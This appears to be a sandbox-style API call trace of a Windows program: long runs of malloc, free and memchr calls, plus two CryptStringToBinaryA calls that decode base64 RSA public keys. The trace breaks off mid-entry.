[0143.066] free (_Block=0x3f65300) [0143.066] free (_Block=0x60dcd8) [0143.066] free (_Block=0x3e22590) [0143.066] memchr (_Buf=0x3f654c0, _Val=32, _MaxCount=0x17) returned 0x3f654ca [0143.066] malloc (_Size=0xb) returned 0x3648d40 [0143.067] free (_Block=0x0) [0143.067] malloc (_Size=0x40) returned 0x3e22278 [0143.067] free (_Block=0x0) [0143.067] free (_Block=0x0) [0143.067] memchr (_Buf=0x3f654cb, _Val=32, _MaxCount=0xc) returned 0x0 [0143.067] malloc (_Size=0xd) returned 0x3648d58 [0143.067] free (_Block=0x0) [0143.067] free (_Block=0x0) [0143.067] free (_Block=0x3648d40) [0143.067] free (_Block=0x3648d58) [0143.067] free (_Block=0x3e22278) [0143.067] memchr (_Buf=0x3648ce0, _Val=32, _MaxCount=0xf) returned 0x3648cea [0143.067] malloc (_Size=0xb) returned 0x3648d40 [0143.067] free (_Block=0x0) [0143.067] malloc (_Size=0x40) returned 0x3e223e0 [0143.067] free (_Block=0x0) [0143.067] free (_Block=0x0) [0143.067] memchr (_Buf=0x3648ceb, _Val=32, _MaxCount=0x4) returned 0x0 [0143.067] malloc (_Size=0x5) returned 0x3f4bfb8 [0143.067] free (_Block=0x0) [0143.067] free (_Block=0x0) [0143.067] free (_Block=0x3648d40) [0143.067] free (_Block=0x3f4bfb8) [0143.067] free (_Block=0x3e223e0) [0143.067] memchr (_Buf=0x3648d28, _Val=32, _MaxCount=0x9) returned 0x0 [0143.067] malloc (_Size=0xa) returned 0x3648e30 [0143.067] free (_Block=0x0) [0143.067] malloc (_Size=0x40) returned 0x3e22590 [0143.067] free (_Block=0x0) [0143.067] free (_Block=0x0) [0143.068] free (_Block=0x3648e30) [0143.068] free (_Block=0x3e22590) [0143.068] memchr (_Buf=0x3d80300, _Val=32, _MaxCount=0x1e) returned 0x3d8030a [0143.068] malloc (_Size=0xb) returned 0x3648db8 [0143.069] free (_Block=0x0) [0143.069] malloc (_Size=0x40) returned 0x3e225d8 [0143.069] free (_Block=0x0) [0143.069] free (_Block=0x0) [0143.069] memchr (_Buf=0x3d8030b, _Val=32, _MaxCount=0x13) returned 0x3d8030e [0143.069] malloc (_Size=0x4) returned 0x3f4bf88 [0143.069] free (_Block=0x0) [0143.069] free (_Block=0x0) [0143.069] memchr (_Buf=0x3d8030f, _Val=32, _MaxCount=0xf) returned 0x3d80315 [0143.069] malloc (_Size=0x7) returned 0x3f4bf48 [0143.069] free (_Block=0x0) [0143.069] free (_Block=0x0) [0143.069] memchr (_Buf=0x3d80316, _Val=32, _MaxCount=0x8) returned 0x0 [0143.069] malloc (_Size=0x9) returned 0x3648e30 [0143.069] free (_Block=0x0) [0143.069] free (_Block=0x0) [0143.069] free (_Block=0x3648db8) [0143.069] free (_Block=0x3f4bf88) [0143.069] free (_Block=0x3f4bf48) [0143.069] free (_Block=0x3648e30) [0143.069] free (_Block=0x3e225d8) [0143.069] memchr (_Buf=0x60e8c8, _Val=32, _MaxCount=0x40) returned 0x0 [0143.069] malloc (_Size=0x41) returned 0x36923e8 [0143.069] free (_Block=0x0) [0143.069] malloc (_Size=0x40) returned 0x3e22590 [0143.070] free (_Block=0x0) [0143.070] free (_Block=0x0) [0143.070] free (_Block=0x36923e8) [0143.070] free (_Block=0x3e22590) [0143.070] memchr (_Buf=0x60ec38, _Val=32, _MaxCount=0x40) returned 0x0 [0143.070] malloc (_Size=0x41) returned 0x3692848 [0143.070] free (_Block=0x0) [0143.070] malloc (_Size=0x40) returned 0x3e224b8 [0143.070] free (_Block=0x0) [0143.070] free (_Block=0x0) [0143.070] free (_Block=0x3692848) [0143.070] free (_Block=0x3e224b8) [0143.070] memchr (_Buf=0x3e222c0, _Val=32, _MaxCount=0x3c) returned 0x0 [0143.070] malloc (_Size=0x3d) returned 0x3e225d8 [0143.070] free (_Block=0x0) [0143.070] malloc (_Size=0x40) returned 0x3e22668 [0143.070] free (_Block=0x0) [0143.070] free (_Block=0x0) [0143.070] free (_Block=0x3e225d8) [0143.070] free (_Block=0x3e22668) [0143.070] memchr (_Buf=0x3d80328, _Val=32, _MaxCount=0x1c) returned 0x3d80330 [0143.070] malloc (_Size=0x9) returned 0x3648ea8 [0143.070] free (_Block=0x0) [0143.070] malloc (_Size=0x40) returned 0x3e22158 [0143.070] free (_Block=0x0) [0143.070] free (_Block=0x0) [0143.070] memchr (_Buf=0x3d80331, _Val=32, _MaxCount=0x13) returned 0x3d80334 [0143.070] malloc (_Size=0x4) returned 0x3f4bfb8 [0143.070] free (_Block=0x0) [0143.070] free (_Block=0x0) [0143.070] memchr (_Buf=0x3d80335, _Val=32, _MaxCount=0xf) returned 0x3d8033b [0143.070] malloc (_Size=0x7) returned 0x3f4c058 [0143.071] free (_Block=0x0) [0143.071] free (_Block=0x0) [0143.071] memchr (_Buf=0x3d8033c, _Val=32, _MaxCount=0x8) returned 0x0 [0143.071] malloc (_Size=0x9) returned 0x3648e48 [0143.071] free (_Block=0x0) [0143.071] free (_Block=0x0) [0143.071] free (_Block=0x3648ea8) [0143.071] free (_Block=0x3f4bfb8) [0143.071] free (_Block=0x3f4c058) [0143.071] free (_Block=0x3648e48) [0143.071] free (_Block=0x3e22158) [0143.071] memchr (_Buf=0x3648ec0, _Val=32, _MaxCount=0xb) returned 0x0 [0143.071] malloc (_Size=0xc) returned 0x3648c80 [0143.071] free (_Block=0x0) [0143.071] malloc (_Size=0x40) returned 0x3e224b8 [0143.071] free (_Block=0x0) [0143.071] free (_Block=0x0) [0143.071] free (_Block=0x3648c80) [0143.071] free (_Block=0x3e224b8) [0143.071] memchr (_Buf=0x3d801e8, _Val=32, _MaxCount=0x1e) returned 0x3d801f2 [0143.071] malloc (_Size=0xb) returned 0x3648ef0 [0143.071] free (_Block=0x0) [0143.071] malloc (_Size=0x40) returned 0x3e22308 [0143.071] free (_Block=0x0) [0143.071] free (_Block=0x0) [0143.071] memchr (_Buf=0x3d801f3, _Val=32, _MaxCount=0x13) returned 0x3d801f6 [0143.071] malloc (_Size=0x4) returned 0x3f4c048 [0143.071] free (_Block=0x0) [0143.071] free (_Block=0x0) [0143.071] memchr (_Buf=0x3d801f7, _Val=32, _MaxCount=0xf) returned 0x3d801fd [0143.072] malloc (_Size=0x7) returned 0x3f4bfb8 [0143.072] free (_Block=0x0) [0143.072] free (_Block=0x0) [0143.072] memchr (_Buf=0x3d801fe, _Val=32, _MaxCount=0x8) returned 0x0 [0143.072] malloc (_Size=0x9) returned 0x3648d40 [0143.072] free (_Block=0x0) [0143.072] free (_Block=0x0) [0143.072] free (_Block=0x3648ef0) [0143.072] free (_Block=0x3f4c048) [0143.072] free (_Block=0x3f4bfb8) [0143.072] free (_Block=0x3648d40) [0143.072] free (_Block=0x3e22308) [0143.072] memchr (_Buf=0x60ed28, _Val=32, _MaxCount=0x40) returned 0x0 [0143.072] malloc (_Size=0x41) returned 0x3692438 [0143.072] free (_Block=0x0) [0143.072] malloc (_Size=0x40) returned 0x3e226f8 [0143.072] free (_Block=0x0) [0143.072] free (_Block=0x0) [0143.072] malloc (_Size=0x41) returned 0x36923e8 [0143.072] free (_Block=0x0) [0143.072] free (_Block=0x3692438) [0143.072] free (_Block=0x3e226f8) [0143.072] memchr (_Buf=0x60ee18, _Val=32, _MaxCount=0x40) returned 0x0 [0143.072] malloc (_Size=0x41) returned 0x3692848 [0143.072] free (_Block=0x0) [0143.072] malloc (_Size=0x40) returned 0x3e223e0 [0143.072] free (_Block=0x0) [0143.072] free (_Block=0x0) [0143.072] malloc (_Size=0x81) returned 0x60cb60 [0143.073] free (_Block=0x36923e8) [0143.073] free (_Block=0x3692848) [0143.073] free (_Block=0x3e223e0) [0143.073] memchr (_Buf=0x3e22620, _Val=32, _MaxCount=0x3c) returned 0x0 [0143.073] malloc (_Size=0x3d) returned 0x3e226f8 [0143.073] free (_Block=0x0) [0143.073] malloc (_Size=0x40) returned 0x3e22428 [0143.073] free (_Block=0x0) [0143.073] free (_Block=0x0) [0143.073] malloc (_Size=0xc1) returned 0x3594d18 [0143.073] free (_Block=0x60cb60) [0143.073] free (_Block=0x3e226f8) [0143.073] free (_Block=0x3e22428) [0143.073] memchr (_Buf=0x3d80120, _Val=32, _MaxCount=0x1c) returned 0x3d80128 [0143.073] malloc (_Size=0x9) returned 0x3648ed8 [0143.073] free (_Block=0x0) [0143.073] malloc (_Size=0x40) returned 0x3e22500 [0143.073] free (_Block=0x0) [0143.073] free (_Block=0x0) [0143.073] memchr (_Buf=0x3d80129, _Val=32, _MaxCount=0x13) returned 0x3d8012c [0143.073] malloc (_Size=0x4) returned 0x3f4bf68 [0143.073] free (_Block=0x0) [0143.073] free (_Block=0x0) [0143.073] memchr (_Buf=0x3d8012d, _Val=32, _MaxCount=0xf) returned 0x3d80133 [0143.073] malloc (_Size=0x7) returned 0x3f4c0c8 [0143.073] free (_Block=0x0) [0143.073] free (_Block=0x0) [0143.073] memchr (_Buf=0x3d80134, _Val=32, _MaxCount=0x8) returned 0x0 [0143.073] malloc (_Size=0x9) returned 0x3648d40 [0143.074] free (_Block=0x0) [0143.074] free (_Block=0x0) [0143.074] CryptStringToBinaryA (in: pszString="MIGJAoGBAM7y2qW7Y7OvvDBvDR3XkIS9Z102GsmrusHAS63eVDnm5r+vGIU869c6LqeXbb6xDgrh/COO1kqvf2Tx53MQt1KnOZqC3vS7Ke7qBUiZ4WN02T7v7nn9q0PHXIfjTM/QaeOGwRZB1vauKJg99fL8eAUriGDyhGA210LsHcI3ZS6TAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339f9c0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339f9c0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0143.074] malloc (_Size=0x8c) returned 0x6066d8 [0143.074] free (_Block=0x0) [0143.074] CryptStringToBinaryA (in: pszString="MIGJAoGBAM7y2qW7Y7OvvDBvDR3XkIS9Z102GsmrusHAS63eVDnm5r+vGIU869c6LqeXbb6xDgrh/COO1kqvf2Tx53MQt1KnOZqC3vS7Ke7qBUiZ4WN02T7v7nn9q0PHXIfjTM/QaeOGwRZB1vauKJg99fL8eAUriGDyhGA210LsHcI3ZS6TAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x6066d8, pcbBinary=0x339f9c0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x6066d8, pcbBinary=0x339f9c0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0143.074] malloc (_Size=0x8c) returned 0x3594e80 [0143.074] free (_Block=0x0) [0143.074] free (_Block=0x0) [0143.074] free (_Block=0x6066d8) [0143.074] malloc (_Size=0x10) returned 0x3648d58 [0143.074] free (_Block=0x0) [0143.074] free (_Block=0x3648ed8) [0143.074] free (_Block=0x3f4bf68) [0143.074] free (_Block=0x3f4c0c8) [0143.074] free (_Block=0x3648d40) [0143.074] free (_Block=0x3e22500) [0143.074] memchr (_Buf=0x3624530, _Val=32, _MaxCount=0x33) returned 0x3624542 [0143.074] malloc (_Size=0x13) returned 0x3f653c0 [0143.074] free (_Block=0x0) [0143.074] malloc (_Size=0x40) returned 0x3e22158 [0143.074] free (_Block=0x0) [0143.074] free (_Block=0x0) [0143.074] memchr (_Buf=0x3624543, _Val=32, _MaxCount=0x20) returned 0x0 [0143.074] malloc (_Size=0x21) returned 0x60dd98 [0143.074] free (_Block=0x0) [0143.074] free (_Block=0x0) [0143.075] malloc (_Size=0x14) returned 0x3f651e0 [0143.075] free (_Block=0x0) [0143.075] malloc (_Size=0x14) returned 0x3f65360 [0143.075] free (_Block=0x0) [0143.075] free (_Block=0x3f65360) [0143.075] free (_Block=0x3f651e0) [0143.075] free (_Block=0x3f653c0) [0143.075] free (_Block=0x60dd98) [0143.075] free (_Block=0x3e22158) [0143.075] memchr (_Buf=0x3d800a8, _Val=32, _MaxCount=0x18) returned 0x3d800b2 [0143.075] malloc (_Size=0xb) returned 0x3648d40 [0143.075] free (_Block=0x0) [0143.075] malloc (_Size=0x40) returned 0x3e22230 [0143.075] free (_Block=0x0) [0143.075] free (_Block=0x0) [0143.075] memchr (_Buf=0x3d800b3, _Val=32, _MaxCount=0xd) returned 0x0 [0143.075] malloc (_Size=0xe) returned 0x3648db8 [0143.075] free (_Block=0x0) [0143.075] free (_Block=0x0) [0143.075] free (_Block=0x3648d40) [0143.075] free (_Block=0x3648db8) [0143.075] free (_Block=0x3e22230) [0143.075] memchr (_Buf=0x3648e00, _Val=32, _MaxCount=0xf) returned 0x3648e0a [0143.075] malloc (_Size=0xb) returned 0x3648e30 [0143.075] free (_Block=0x0) [0143.075] malloc (_Size=0x40) returned 0x3e22350 [0143.075] free (_Block=0x0) [0143.075] free (_Block=0x0) [0143.075] memchr (_Buf=0x3648e0b, _Val=32, _MaxCount=0x4) returned 0x0 [0143.076] malloc (_Size=0x5) returned 0x3f4c058 [0143.076] free (_Block=0x0) [0143.076] free (_Block=0x0) [0143.076] free (_Block=0x3648e30) [0143.076] free (_Block=0x3f4c058) [0143.076] free (_Block=0x3e22350) [0143.076] memchr (_Buf=0x3648e18, _Val=32, _MaxCount=0x9) returned 0x0 [0143.076] malloc (_Size=0xa) returned 0x3648d88 [0143.076] free (_Block=0x0) [0143.076] malloc (_Size=0x40) returned 0x3e226f8 [0143.076] free (_Block=0x0) [0143.076] free (_Block=0x0) [0143.076] free (_Block=0x3648d88) [0143.076] free (_Block=0x3e226f8) [0143.076] memchr (_Buf=0x3d801c0, _Val=32, _MaxCount=0x1e) returned 0x3d801ca [0143.076] malloc (_Size=0xb) returned 0x3648c68 [0143.076] free (_Block=0x0) [0143.076] malloc (_Size=0x40) returned 0x3e22158 [0143.076] free (_Block=0x0) [0143.076] free (_Block=0x0) [0143.076] memchr (_Buf=0x3d801cb, _Val=32, _MaxCount=0x13) returned 0x3d801ce [0143.076] malloc (_Size=0x4) returned 0x3f4bf38 [0143.076] free (_Block=0x0) [0143.076] free (_Block=0x0) [0143.076] memchr (_Buf=0x3d801cf, _Val=32, _MaxCount=0xf) returned 0x3d801d5 [0143.076] malloc (_Size=0x7) returned 0x3f4bf98 [0143.076] free (_Block=0x0) [0143.076] free (_Block=0x0) [0143.076] memchr (_Buf=0x3d801d6, _Val=32, _MaxCount=0x8) returned 0x0 [0143.076] malloc (_Size=0x9) returned 0x3648ea8 [0143.077] free (_Block=0x0) [0143.077] free (_Block=0x0) [0143.077] free (_Block=0x3648c68) [0143.077] free (_Block=0x3f4bf38) [0143.077] free (_Block=0x3f4bf98) [0143.077] free (_Block=0x3648ea8) [0143.077] free (_Block=0x3e22158) [0143.077] memchr (_Buf=0x60ee68, _Val=32, _MaxCount=0x40) returned 0x0 [0143.077] malloc (_Size=0x41) returned 0x3692488 [0143.077] free (_Block=0x0) [0143.077] malloc (_Size=0x40) returned 0x3e224b8 [0143.077] free (_Block=0x0) [0143.077] free (_Block=0x0) [0143.077] free (_Block=0x3692488) [0143.077] free (_Block=0x3e224b8) [0143.077] memchr (_Buf=0x60e6e8, _Val=32, _MaxCount=0x40) returned 0x0 [0143.077] malloc (_Size=0x41) returned 0x36928e8 [0143.077] free (_Block=0x0) [0143.077] malloc (_Size=0x40) returned 0x3e22668 [0143.077] free (_Block=0x0) [0143.077] free (_Block=0x0) [0143.077] free (_Block=0x36928e8) [0143.077] free (_Block=0x3e22668) [0143.077] memchr (_Buf=0x3e22470, _Val=32, _MaxCount=0x3c) returned 0x0 [0143.077] malloc (_Size=0x3d) returned 0x3e221e8 [0143.077] free (_Block=0x0) [0143.077] malloc (_Size=0x40) returned 0x3e22590 [0143.077] free (_Block=0x0) [0143.077] free (_Block=0x0) [0143.077] free (_Block=0x3e221e8) [0143.078] free (_Block=0x3e22590) [0143.078] memchr (_Buf=0x3d803a0, _Val=32, _MaxCount=0x1c) returned 0x3d803a8 [0143.078] malloc (_Size=0x9) returned 0x3648e30 [0143.078] free (_Block=0x0) [0143.078] malloc (_Size=0x40) returned 0x3e221e8 [0143.078] free (_Block=0x0) [0143.078] free (_Block=0x0) [0143.078] memchr (_Buf=0x3d803a9, _Val=32, _MaxCount=0x13) returned 0x3d803ac [0143.078] malloc (_Size=0x4) returned 0x3f4c058 [0143.078] free (_Block=0x0) [0143.078] free (_Block=0x0) [0143.078] memchr (_Buf=0x3d803ad, _Val=32, _MaxCount=0xf) returned 0x3d803b3 [0143.078] malloc (_Size=0x7) returned 0x3f4c0d8 [0143.078] free (_Block=0x0) [0143.078] free (_Block=0x0) [0143.078] memchr (_Buf=0x3d803b4, _Val=32, _MaxCount=0x8) returned 0x0 [0143.078] malloc (_Size=0x9) returned 0x3648c80 [0143.078] free (_Block=0x0) [0143.078] free (_Block=0x0) [0143.078] free (_Block=0x3648e30) [0143.078] free (_Block=0x3f4c058) [0143.078] free (_Block=0x3f4c0d8) [0143.078] free (_Block=0x3648c80) [0143.078] free (_Block=0x3e221e8) [0143.078] memchr (_Buf=0x3648cf8, _Val=32, _MaxCount=0xb) returned 0x0 [0143.078] malloc (_Size=0xc) returned 0x3648da0 [0143.078] free (_Block=0x0) [0143.078] malloc (_Size=0x40) returned 0x3e22278 [0143.078] free (_Block=0x0) [0143.078] free (_Block=0x0) [0143.079] free (_Block=0x3648da0) [0143.079] free (_Block=0x3e22278) [0143.079] memchr (_Buf=0x3d80210, _Val=32, _MaxCount=0x1e) returned 0x3d8021a [0143.079] malloc (_Size=0xb) returned 0x3648e30 [0143.079] free (_Block=0x0) [0143.079] malloc (_Size=0x40) returned 0x3e223e0 [0143.079] free (_Block=0x0) [0143.079] free (_Block=0x0) [0143.079] memchr (_Buf=0x3d8021b, _Val=32, _MaxCount=0x13) returned 0x3d8021e [0143.079] malloc (_Size=0x4) returned 0x3f4bf18 [0143.079] free (_Block=0x0) [0143.079] free (_Block=0x0) [0143.079] memchr (_Buf=0x3d8021f, _Val=32, _MaxCount=0xf) returned 0x3d80225 [0143.079] malloc (_Size=0x7) returned 0x3f4c048 [0143.079] free (_Block=0x0) [0143.079] free (_Block=0x0) [0143.079] memchr (_Buf=0x3d80226, _Val=32, _MaxCount=0x8) returned 0x0 [0143.079] malloc (_Size=0x9) returned 0x3648c80 [0143.079] free (_Block=0x0) [0143.079] free (_Block=0x0) [0143.079] free (_Block=0x3648e30) [0143.079] free (_Block=0x3f4bf18) [0143.079] free (_Block=0x3f4c048) [0143.079] free (_Block=0x3648c80) [0143.079] free (_Block=0x3e223e0) [0143.079] memchr (_Buf=0x60e738, _Val=32, _MaxCount=0x40) returned 0x0 [0143.079] malloc (_Size=0x41) returned 0x3692848 [0143.079] free (_Block=0x0) [0143.079] malloc (_Size=0x40) returned 0x3e226f8 [0143.080] free (_Block=0x0) [0143.080] free (_Block=0x0) [0143.080] free (_Block=0x3692848) [0143.080] free (_Block=0x3e226f8) [0143.080] memchr (_Buf=0x60e788, _Val=32, _MaxCount=0x40) returned 0x0 [0143.080] malloc (_Size=0x41) returned 0x3692708 [0143.080] free (_Block=0x0) [0143.080] malloc (_Size=0x40) returned 0x3e225d8 [0143.080] free (_Block=0x0) [0143.080] free (_Block=0x0) [0143.080] free (_Block=0x3692708) [0143.080] free (_Block=0x3e225d8) [0143.080] memchr (_Buf=0x3e22080, _Val=32, _MaxCount=0x3c) returned 0x0 [0143.080] malloc (_Size=0x3d) returned 0x3e22110 [0143.080] free (_Block=0x0) [0143.080] malloc (_Size=0x40) returned 0x3e22428 [0143.080] free (_Block=0x0) [0143.080] free (_Block=0x0) [0143.080] free (_Block=0x3e22110) [0143.080] free (_Block=0x3e22428) [0143.080] memchr (_Buf=0x3d80080, _Val=32, _MaxCount=0x1c) returned 0x3d80088 [0143.080] malloc (_Size=0x9) returned 0x3648ef0 [0143.080] free (_Block=0x0) [0143.080] malloc (_Size=0x40) returned 0x3e226f8 [0143.080] free (_Block=0x0) [0143.080] free (_Block=0x0) [0143.080] memchr (_Buf=0x3d80089, _Val=32, _MaxCount=0x13) returned 0x3d8008c [0143.080] malloc (_Size=0x4) returned 0x3f4bf58 [0143.081] free (_Block=0x0) [0143.081] free (_Block=0x0) [0143.081] memchr (_Buf=0x3d8008d, _Val=32, _MaxCount=0xf) returned 0x3d80093 [0143.081] malloc (_Size=0x7) returned 0x3f4c018 [0143.081] free (_Block=0x0) [0143.081] free (_Block=0x0) [0143.081] memchr (_Buf=0x3d80094, _Val=32, _MaxCount=0x8) returned 0x0 [0143.081] malloc (_Size=0x9) returned 0x3648d40 [0143.081] free (_Block=0x0) [0143.081] free (_Block=0x0) [0143.081] CryptStringToBinaryA (in: pszString="MIGJAoGBAL9v/75bZHzkkCAnWu8kYgxSWfbrf8Omq2DoqEt/sVPaq9t6YjYPfYJ0TYjxinsaONBHTeXxd6qgaW6dFZs1R0CEd2aFRMTwEX4m3xyChFwfdNGcnUZKVMjqca7D5sHMBbW8GeLGfAQ7b8tr9rk0C9MNaz5XcvtgXJtSAt9ysjdVAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339f9c0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339f9c0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0143.081] malloc (_Size=0x8c) returned 0x6066d8 [0143.081] free (_Block=0x0) [0143.081] CryptStringToBinaryA (in: pszString="MIGJAoGBAL9v/75bZHzkkCAnWu8kYgxSWfbrf8Omq2DoqEt/sVPaq9t6YjYPfYJ0TYjxinsaONBHTeXxd6qgaW6dFZs1R0CEd2aFRMTwEX4m3xyChFwfdNGcnUZKVMjqca7D5sHMBbW8GeLGfAQ7b8tr9rk0C9MNaz5XcvtgXJtSAt9ysjdVAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x6066d8, pcbBinary=0x339f9c0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x6066d8, pcbBinary=0x339f9c0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0143.081] malloc (_Size=0x8c) returned 0x3f6aea0 [0143.081] free (_Block=0x0) [0143.081] free (_Block=0x0) [0143.081] free (_Block=0x6066d8) [0143.081] free (_Block=0x3648ef0) [0143.081] free (_Block=0x3f4bf58) [0143.081] free (_Block=0x3f4c018) [0143.081] free (_Block=0x3648d40) [0143.081] free (_Block=0x3e226f8) [0143.081] memchr (_Buf=0x36246f0, _Val=32, _MaxCount=0x33) returned 0x3624702 [0143.081] malloc (_Size=0x13) returned 0x3f65360 [0143.081] free (_Block=0x0) [0143.081] malloc (_Size=0x40) returned 0x3e22308 [0143.082] free (_Block=0x0) [0143.082] free (_Block=0x0) [0143.082] memchr (_Buf=0x3624703, _Val=32, _MaxCount=0x20) returned 0x0 [0143.082] malloc (_Size=0x21) returned 0x60dd98 [0143.082] free (_Block=0x0) [0143.082] free (_Block=0x0) [0143.082] malloc (_Size=0x14) returned 0x3f65300 [0143.082] free (_Block=0x0) [0143.082] malloc (_Size=0x14) returned 0x3f653c0 [0143.082] free (_Block=0x0) [0143.082] free (_Block=0x3f653c0) [0143.082] free (_Block=0x3f65300) [0143.082] free (_Block=0x3f65360) [0143.082] free (_Block=0x60dd98) [0143.082] free (_Block=0x3e22308) [0143.083] memchr (_Buf=0x3d80238, _Val=32, _MaxCount=0x1a) returned 0x3d80242 [0143.083] malloc (_Size=0xb) returned 0x3648d40 [0143.083] free (_Block=0x0) [0143.083] malloc (_Size=0x40) returned 0x3e223e0 [0143.083] free (_Block=0x0) [0143.083] free (_Block=0x0) [0143.083] memchr (_Buf=0x3d80243, _Val=32, _MaxCount=0xf) returned 0x0 [0143.083] malloc (_Size=0x10) returned 0x3648ea8 [0143.083] free (_Block=0x0) [0143.083] free (_Block=0x0) [0143.083] free (_Block=0x3648d40) [0143.083] free (_Block=0x3648ea8) [0143.083] free (_Block=0x3e223e0) [0143.083] memchr (_Buf=0x3648de8, _Val=32, _MaxCount=0xf) returned 0x3648df2 [0143.083] malloc (_Size=0xb) returned 0x3648c68 [0143.083] free (_Block=0x0) [0143.083] malloc (_Size=0x40) returned 0x3e22590 [0143.083] free (_Block=0x0) [0143.083] free (_Block=0x0) [0143.083] memchr (_Buf=0x3648df3, _Val=32, _MaxCount=0x4) returned 0x0 [0143.083] malloc (_Size=0x5) returned 0x3f4c078 [0143.201] free (_Block=0x0) [0143.201] free (_Block=0x0) [0143.201] free (_Block=0x3648c68) [0143.201] free (_Block=0x3f4c078) [0143.201] free (_Block=0x3e22590) [0143.201] memchr (_Buf=0x3648e90, _Val=32, _MaxCount=0x9) returned 0x0 [0143.201] malloc (_Size=0xa) returned 0x3648e48 [0143.201] free (_Block=0x0) [0143.201] malloc (_Size=0x40) returned 0x3e223e0 [0143.201] free (_Block=0x0) [0143.201] free (_Block=0x0) [0143.201] free (_Block=0x3648e48) [0143.201] free (_Block=0x3e223e0) [0143.201] memchr (_Buf=0x3d800d0, _Val=32, _MaxCount=0x1e) returned 0x3d800da [0143.201] malloc (_Size=0xb) returned 0x3648e30 [0143.201] free (_Block=0x0) [0143.201] malloc (_Size=0x40) returned 0x3e224b8 [0143.202] free (_Block=0x0) [0143.202] free (_Block=0x0) [0143.202] memchr (_Buf=0x3d800db, _Val=32, _MaxCount=0x13) returned 0x3d800de [0143.202] malloc (_Size=0x4) returned 0x3f4c0e8 [0143.202] free (_Block=0x0) [0143.202] free (_Block=0x0) [0143.202] memchr (_Buf=0x3d800df, _Val=32, _MaxCount=0xf) returned 0x3d800e5 [0143.202] malloc (_Size=0x7) returned 0x3f4bf18 [0143.202] free (_Block=0x0) [0143.202] free (_Block=0x0) [0143.202] memchr (_Buf=0x3d800e6, _Val=32, _MaxCount=0x8) returned 0x0 [0143.202] malloc (_Size=0x9) returned 0x3648d88 [0143.202] free (_Block=0x0) [0143.202] free (_Block=0x0) [0143.202] free (_Block=0x3648e30) [0143.202] free (_Block=0x3f4c0e8) [0143.202] free (_Block=0x3f4bf18) [0143.202] free (_Block=0x3648d88) [0143.202] free (_Block=0x3e224b8) [0143.202] memchr (_Buf=0x3692938, _Val=32, _MaxCount=0x40) returned 0x0 [0143.202] malloc (_Size=0x41) returned 0x3692848 [0143.202] free (_Block=0x0) [0143.202] malloc (_Size=0x40) returned 0x3e22278 [0143.202] free (_Block=0x0) [0143.202] free (_Block=0x0) [0143.202] free (_Block=0x3692848) [0143.202] free (_Block=0x3e22278) [0143.202] memchr (_Buf=0x36927f8, _Val=32, _MaxCount=0x40) returned 0x0 [0143.202] malloc (_Size=0x41) returned 0x3692528 [0143.202] free (_Block=0x0) [0143.203] malloc (_Size=0x40) returned 0x3e22308 [0143.203] free (_Block=0x0) [0143.203] free (_Block=0x0) [0143.203] free (_Block=0x3692528) [0143.203] free (_Block=0x3e22308) [0143.203] memchr (_Buf=0x3e22038, _Val=32, _MaxCount=0x3c) returned 0x0 [0143.203] malloc (_Size=0x3d) returned 0x3e221a0 [0143.203] free (_Block=0x0) [0143.203] malloc (_Size=0x40) returned 0x3e224b8 [0143.203] free (_Block=0x0) [0143.203] free (_Block=0x0) [0143.203] free (_Block=0x3e221a0) [0143.203] free (_Block=0x3e224b8) [0143.203] memchr (_Buf=0x3d80148, _Val=32, _MaxCount=0x1c) returned 0x3d80150 [0143.203] malloc (_Size=0x9) returned 0x3648db8 [0143.203] free (_Block=0x0) [0143.203] malloc (_Size=0x40) returned 0x3e224b8 [0143.203] free (_Block=0x0) [0143.203] free (_Block=0x0) [0143.203] memchr (_Buf=0x3d80151, _Val=32, _MaxCount=0x13) returned 0x3d80154 [0143.203] malloc (_Size=0x4) returned 0x3f4c0e8 [0143.203] free (_Block=0x0) [0143.203] free (_Block=0x0) [0143.203] memchr (_Buf=0x3d80155, _Val=32, _MaxCount=0xf) returned 0x3d8015b [0143.203] malloc (_Size=0x7) returned 0x3f4c098 [0143.203] free (_Block=0x0) [0143.203] free (_Block=0x0) [0143.203] memchr (_Buf=0x3d8015c, _Val=32, _MaxCount=0x8) returned 0x0 [0143.203] malloc (_Size=0x9) returned 0x3648f20 [0143.203] free (_Block=0x0) [0143.204] free (_Block=0x0) [0143.204] free (_Block=0x3648db8) [0143.204] free (_Block=0x3f4c0e8) [0143.204] free (_Block=0x3f4c098) [0143.204] free (_Block=0x3648f20) [0143.204] free (_Block=0x3e224b8) [0143.204] memchr (_Buf=0x3648d10, _Val=32, _MaxCount=0xb) returned 0x0 [0143.204] malloc (_Size=0xc) returned 0x3648e30 [0143.204] free (_Block=0x0) [0143.204] malloc (_Size=0x40) returned 0x3e22110 [0143.204] free (_Block=0x0) [0143.204] free (_Block=0x0) [0143.204] free (_Block=0x3648e30) [0143.204] free (_Block=0x3e22110) [0143.204] memchr (_Buf=0x3d80350, _Val=32, _MaxCount=0x1e) returned 0x3d8035a [0143.204] malloc (_Size=0xb) returned 0x3648c50 [0143.204] free (_Block=0x0) [0143.204] malloc (_Size=0x40) returned 0x3e223e0 [0143.204] free (_Block=0x0) [0143.204] free (_Block=0x0) [0143.204] memchr (_Buf=0x3d8035b, _Val=32, _MaxCount=0x13) returned 0x3d8035e [0143.204] malloc (_Size=0x4) returned 0x3f4bf28 [0143.204] free (_Block=0x0) [0143.204] free (_Block=0x0) [0143.204] memchr (_Buf=0x3d8035f, _Val=32, _MaxCount=0xf) returned 0x3d80365 [0143.204] malloc (_Size=0x7) returned 0x3f4c0b8 [0143.204] free (_Block=0x0) [0143.204] free (_Block=0x0) [0143.204] memchr (_Buf=0x3d80366, _Val=32, _MaxCount=0x8) returned 0x0 [0143.204] malloc (_Size=0x9) returned 0x3648e30 [0143.205] free (_Block=0x0) [0143.205] free (_Block=0x0) [0143.205] free (_Block=0x3648c50) [0143.205] free (_Block=0x3f4bf28) [0143.205] free 